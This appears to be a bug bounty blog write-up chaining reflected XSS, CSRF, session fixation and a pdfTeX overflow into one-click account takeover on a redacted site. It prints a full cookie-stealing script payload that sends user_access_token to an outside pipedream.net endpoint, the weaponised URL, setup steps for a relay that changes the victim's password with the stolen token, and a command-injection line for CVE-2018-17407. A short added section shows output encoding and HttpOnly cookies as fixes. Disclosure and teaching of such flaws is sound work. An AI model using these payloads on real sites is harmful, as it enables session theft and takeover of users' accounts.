From XSS To CSRF | One-click Authorized Access To Account Takeover
Hey Guys, I’ll show you today my latest finding in a company that may very soon become a tech unicorn! The name of the company is obscured per the company’s own disclosure policy.
Chain 4 Vulnerabilities To Reach Maximum Impact Possible
1st — [Reflected XSS] -
XSS enables attackers to inject client-side scripts into an HTML context viewed by other users. So I tried to execute a simple payload in the search box.
and it worked!
Honestly, I didn’t expect that. So I decided to dig deeper, highly confident that I would find more vulnerabilities. The impact of this vulnerability on the user is severe because of the ability to steal the user’s cookies and use them to access the website again. I used ngrok to tunnel to my localhost and exfiltrated the document.cookie value in an HTTP request sent through XMLHttpRequest (XHR).
Let’s remove the spaces and condense the code a bit.
When we check the ngrok dashboard, we see the user’s cookies in the request. Notice the most important one, user_access_token; we will come back to it later.
We can add these cookies to the browser, send them to the website and log in as the victim.
2nd — [Cross-Site Request Forgery] -
I intercepted the change-password request. Looking carefully, I noticed that the JSON Web Token we got from the previous XSS (user_access_token) is used without any CSRF token, so I was able to change the password and take over the account. Moreover, the API response returns user information containing sensitive data such as the email address, so the attacker can use it to log in without any hassle.
Replacing the JWT in the Authorization header with the stolen user_access_token changes the password on behalf of the user.
I tried to chain the XSS with the CSRF to take over the account and increase the impact of the vulnerabilities, with a scenario I called “Link2Hack”: the victim only needs to click on a link to have their session cookies hijacked, their password changed and their email address retrieved in the response instantly.
Let’s jump to the practical part.
1) Maintain your workflow
When you click on “new workflow”, you’ll get your workflow endpoint, e.g.:
Add a new action to your workflow by clicking on the + button between any two steps.
I will choose the fastest way and select “Send HTTP Request”. It has one required parameter: the URL where you want to send the HTTP request. To change the HTTP method, or add an HTTP payload, query string parameters or headers, I click “add individual property”. I change the method to PATCH, then set the headers, which is very important to build a correct request:
Accept: application/vnd.api+json
Origin: https://redacted.net
Content-Type: application/vnd.api+json
Authorization: Bearer
Now we’re going to work on the Authorization header and concatenate the user_access_token value to the word ‘Bearer’, since the application uses JWT. I’ll pass this value through the ‘c’ query parameter, reading it from the steps object. For example, I can access properties of the incoming HTTP request using:
steps.trigger.event.body : A string or object representation of the HTTP payload
steps.trigger.event.client_ip : IP address of the client that made the request
steps.trigger.event.headers : HTTP headers, represented as an object
steps.trigger.event.method : HTTP method
steps.trigger.event.url : Request host + path
steps.trigger.event.query : URL Parameters
Accessing the ‘c’ parameter looks like this:
Final step: add the body of the request in the payload parameter, which contains the new password.
2) Get specific cookie value
Since we receive other values too (LiToken, ci_sessions, user_access_token) and we only need user_access_token to make the request, I’ll use a regex to cut it out of the cookie string. The replace() method searches a string for a specified value or a regular expression and returns a new string in which the matches are replaced.
So the final payload is going to look like this:
<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>
Well done, everything is set up right. The full URL:
https://redacted.com/?q=<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>
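As an added example (not the author’s code, and not the target application’s), here is the server-side view of the two things that made the chain above possible: the ?q= search parameter reflected unencoded into the page, and a session token readable from document.cookie. The function names and the sample payload are invented for this demo.

```javascript
// Added example, not the write-up's code: the reflected search page shown
// first the vulnerable way and then with HTML entity encoding, plus a
// Set-Cookie builder that keeps the session token out of document.cookie.

// Encode the five characters that let input break out of an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable: the query is concatenated straight into the markup, so the
// <script> from the URL is rendered as a live script tag.
function renderSearchVulnerable(q) {
  return `<h1>Results for: ${q}</h1>`;
}

// Hardened: the same page with the query HTML-encoded before reflection.
function renderSearchSafe(q) {
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Cheap check used only to show the difference between the two renderers.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Builds the Set-Cookie header for the session token. HttpOnly means the
// browser never exposes it through document.cookie, so a script that does
// land cannot read it; Secure and SameSite limit where the browser sends it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Constructed sample input: the classic proof-of-concept payload.
const samplePayload = '<script>alert(1)</script>';

function demo() {
  return {
    vulnerable: containsScriptTag(renderSearchVulnerable(samplePayload)), // true
    hardened: containsScriptTag(renderSearchSafe(samplePayload)),         // false
    cookie: sessionCookieHeader('user_access_token', 'constructed-token'),
  };
}
```

A content security policy on top of encoding is the usual second layer; encoding alone is what stops this particular reflection.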
3rd — [Session Fixation] -
Session Fixation: authenticating a user, or otherwise establishing a new user session, without invalidating the existing session identifier (session ID) gives an attacker the opportunity to steal authenticated sessions, or to create a new session on the web application and record the associated session identifier. Unfortunately, this is what happened in this web app: after changing the password, the previous session ID still works, which means whoever holds it can continue using the account after the password has changed.
4th — [Possible Buffer Overflow] -
The company allows you to generate a CV from your profile, which is produced in PDF format. I generated a CV and downloaded it, then extracted the PDF metadata using exiftool.
This is pdfTeX, Version 3.14159265-2.6-1.40.15 (TeX Live 2015/dev/Debian) kpathsea version 6.2.1dev. From the TeX Users Group website:
This version is affected by a buffer overflow [CVE-2018-17407] discovered in TeX Live before 2018-09-21. Briefly, it can be used to redirect the name of a glyph from the font file so that it serves as an argument to system(). But what is a glyph? A glyph is a graphical symbol used to represent a readable character for the purposes of writing. Using pdffonts to list the fonts in our PDF:
Its contents are loaded into memory from reading entries like these from the .pfb file:
So the exploit is as follows:
dup 72 /COMMAND_HERE put, for example
dup 72 /whoami put, which executes the command with the permissions of the pdflatex process. Since this vulnerability wasn’t in the web application itself, I wasn’t able to reproduce it. For further information, see this awesome blog post by Nick Roessler, who discovered this vulnerability.
Thank you for reading this far. Your feedback is highly appreciated. Twitter: @Psych0x02